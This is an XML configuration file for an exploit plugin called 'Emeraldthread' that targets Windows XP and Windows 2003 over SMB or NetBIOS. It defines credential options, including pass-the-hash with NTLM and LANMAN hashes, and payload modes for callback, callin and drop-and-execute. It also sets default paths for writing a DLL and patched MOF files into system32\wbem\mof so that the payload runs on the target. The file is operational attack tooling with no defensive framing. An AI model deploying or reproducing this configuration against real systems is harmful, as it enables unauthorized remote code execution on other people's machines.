240 lines
11 KiB
XML
240 lines
11 KiB
XML
<?xml version="1.0"?>
|
|
<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
|
|
name="Emeraldthread"
|
|
version="3.0.0"
|
|
configversion="3.0.0.0"
|
|
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
|
xmlns:t='tc0'>
|
|
|
|
<t:inputparameters>
|
|
<t:parameter name="NetworkTimeout"
|
|
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
|
type="S16"
|
|
default="60" />
|
|
<t:parameter name="TargetIp"
|
|
description="Target IP Address"
|
|
type="IPv4"
|
|
binding="//identifier"/>
|
|
<t:paramchoice name="Protocol"
|
|
default="SMB"
|
|
description="Protocol to connect to target with">
|
|
<t:paramgroup name="SMB"
|
|
description="SMB over TCP">
|
|
<t:parameter name="TargetPort"
|
|
description="Port used by SMB"
|
|
type="TcpPort"
|
|
default="445"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="NBT"
|
|
description="Netbios over TCP">
|
|
<t:parameter name="TargetPort"
|
|
description="Port used by Netbios"
|
|
type="TcpPort"
|
|
default="139"/>
|
|
</t:paramgroup>
|
|
</t:paramchoice>
|
|
<t:paramchoice name="Credentials"
|
|
description="Type of credentials to use">
|
|
<t:paramgroup name="Anonymous"
|
|
description="Anonymous (NULL session)"/>
|
|
<t:paramgroup name="Guest"
|
|
description="Guest account"/>
|
|
<t:paramgroup name="No password"
|
|
description="User account with no password set">
|
|
<t:parameter name="Username"
|
|
description=""
|
|
type="UString"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="Password"
|
|
description="Username and password">
|
|
<t:parameter name="Username"
|
|
description=""
|
|
type="UString"/>
|
|
<t:parameter name="Password"
|
|
description=""
|
|
type="UString"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="NTLM hash"
|
|
description="Username and NTLM hash">
|
|
<t:parameter name="Username"
|
|
description=""
|
|
type="UString"/>
|
|
<t:parameter name="NTLMHash"
|
|
description="NTLM password hash (in hex)"
|
|
type="UString"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="Both hashes"
|
|
description="Username, NTLM hash, and LANMAN hash">
|
|
<t:parameter name="Username"
|
|
description=""
|
|
type="UString"/>
|
|
<t:parameter name="NTLMHash"
|
|
description="NTLM password hash (in hex)"
|
|
type="UString"/>
|
|
<t:parameter name="LANMANHash"
|
|
description="LANMAN password hash (in hex)"
|
|
type="UString"/>
|
|
</t:paramgroup>
|
|
</t:paramchoice>
|
|
<t:paramchoice name="PayloadType"
|
|
description="Callback from target or callin to target"
|
|
default="Callback">
|
|
<t:paramgroup name="Callback"
|
|
description="Target calls back to plugin">
|
|
<t:parameter name="CallbackIp"
|
|
description="Callback IP address"
|
|
type="IPv4"/>
|
|
<t:parameter name="CallbackPort"
|
|
description="Callback port"
|
|
type="TcpPort"
|
|
default="0"/>
|
|
<t:parameter name="CallbackLocalPort"
|
|
description="Local callback port"
|
|
type="TcpPort"
|
|
required="false"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="Callin"
|
|
description="Target waits for call from plugin">
|
|
<t:parameter name="ListenPort"
|
|
description="Listen port"
|
|
type="TcpPort"/>
|
|
<t:parameter name="ListenLocalPort"
|
|
description="Listen port"
|
|
type="TcpPort"
|
|
required="false"/>
|
|
<t:parameter name="ListenWait"
|
|
description="Timeout to wait before trying to connect in."
|
|
type="S16"
|
|
default="10"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="DropAndExecute"
|
|
description="Payload deployed with no feedback">
|
|
<t:parameter name="PayloadContract"
|
|
description="Passthrough contract"
|
|
type="String"
|
|
required="false"/>
|
|
</t:paramgroup>
|
|
</t:paramchoice>
|
|
<t:paramchoice name="PayloadSource"
|
|
description="Payload source input type"
|
|
default="File">
|
|
<t:paramgroup name="File"
|
|
description="Payloads provided by file">
|
|
<t:parameter name="UnconfiguredDLL"
|
|
description="The unconfigured DLL file that will be written to target"
|
|
type="LocalFile"
|
|
default="esud.dll"/>
|
|
<t:parameter name="ConfiguredMOF"
|
|
description="The patched mof file that will be written to target"
|
|
type="LocalFile"
|
|
default="nnetcfg.mof"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="Inline"
|
|
description="Payloads provided inline">
|
|
<t:parameter name="DLLBuffer"
|
|
description="The unconfigured DLL file that will be written to target"
|
|
type="UString"
|
|
required="false"/>
|
|
<t:parameter name="MOFBuffer"
|
|
description="The patched mof file that will be written to target"
|
|
type="UString"
|
|
required="false"/>
|
|
</t:paramgroup>
|
|
</t:paramchoice>
|
|
<t:parameter name="RemoteDLLPath"
|
|
description="The path where we want the DLL to exist on target"
|
|
type="String"
|
|
default="\windows\system32\wbem\wbemess2.tlb"/>
|
|
<t:parameter name="RemoteMOFPath"
|
|
description="The path where we want the patched mof file to exist on target"
|
|
type="String"
|
|
default="\windows\system32\wbem\.\mof\nnetcfg.mof"/>
|
|
<t:parameter name="RemoteMOFTriggerPath"
|
|
description="The path where we want the mof trigger file to exist on target"
|
|
type="String"
|
|
default="\windows\system32\wbem\.\mof\evntprv.mof"/>
|
|
<t:parameter name="PrinterName"
|
|
description="The name of the printer on target"
|
|
type="UString"
|
|
format="Scalar"/>
|
|
</t:inputparameters>
|
|
|
|
<t:outputparameters>
|
|
<t:paramchoice name="PayloadType"
|
|
description="Payload type determines contract">
|
|
<t:paramgroup name="StagedUpload"
|
|
description="Callin or Callback">
|
|
<t:parameter name="ConnectedTcp"
|
|
description="Connected TCP Socket to target"
|
|
type="Socket"/>
|
|
<t:parameter name="Contract"
|
|
description="Plugin contract"
|
|
type="String"
|
|
value="StagedUpload"/>
|
|
<t:parameter name="XorMask"
|
|
description=""
|
|
type="U8"/>
|
|
</t:paramgroup>
|
|
<t:paramgroup name="DropAndExecute"
|
|
description="">
|
|
<t:parameter name="Contract"
|
|
description="Plugin contract"
|
|
type="String"/>
|
|
</t:paramgroup>
|
|
</t:paramchoice>
|
|
</t:outputparameters>
|
|
|
|
<t:redirection>
|
|
<t:local protocol="Tcp"
|
|
listenaddr="TargetIp"
|
|
listenport="TargetPort"
|
|
destaddr="//identifier"
|
|
destport="TargetPort"
|
|
closeoncompletion="false"/>
|
|
<t:local protocol="Tcp"
|
|
listenaddr="TargetIp"
|
|
listenport="ListenLocalPort"
|
|
destaddr="//identifier"
|
|
destport="ListenPort"/>
|
|
<t:remote protocol="Tcp"
|
|
listenaddr="CallbackIp"
|
|
listenport="CallbackPort"
|
|
destport="CallbackLocalPort"/>
|
|
</t:redirection>
|
|
|
|
<t:logic>
|
|
<t:and>
|
|
<t:or>
|
|
<t:service name="smb">
|
|
<t:bindtovalue name="Protocol" value="SMB"/>
|
|
<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
|
|
</t:service>
|
|
<t:service name="nbt">
|
|
<t:bindtovalue name="Protocol" value="NBT"/>
|
|
<t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
|
|
</t:service>
|
|
</t:or>
|
|
<t:or>
|
|
<t:os family="windows" name="Windows XP" servicepack="1">
|
|
<t:bindtovalue name="Target" value="XPSP1"/>
|
|
</t:os>
|
|
<t:os family="windows" name="Windows XP" servicepack="2">
|
|
<t:bindtovalue name="Target" value="XPSP2"/>
|
|
</t:os>
|
|
<t:os family="windows" name="Windows XP" servicepack="3">
|
|
<t:bindtovalue name="Target" value="XPSP3"/>
|
|
</t:os>
|
|
<t:os family="windows" name="Windows 2003" servicepack="0">
|
|
<t:bindtovalue name="Target" value="W2K3SP0"/>
|
|
</t:os>
|
|
<t:os family="windows" name="Windows 2003" servicepack="1">
|
|
<t:bindtovalue name="Target" value="W2K3SP1"/>
|
|
</t:os>
|
|
<t:os family="windows" name="Windows 2003" servicepack="2">
|
|
<t:bindtovalue name="Target" value="W2K3SP2"/>
|
|
</t:os>
|
|
</t:or>
|
|
</t:and>
|
|
</t:logic>
|
|
|
|
</t:config>
|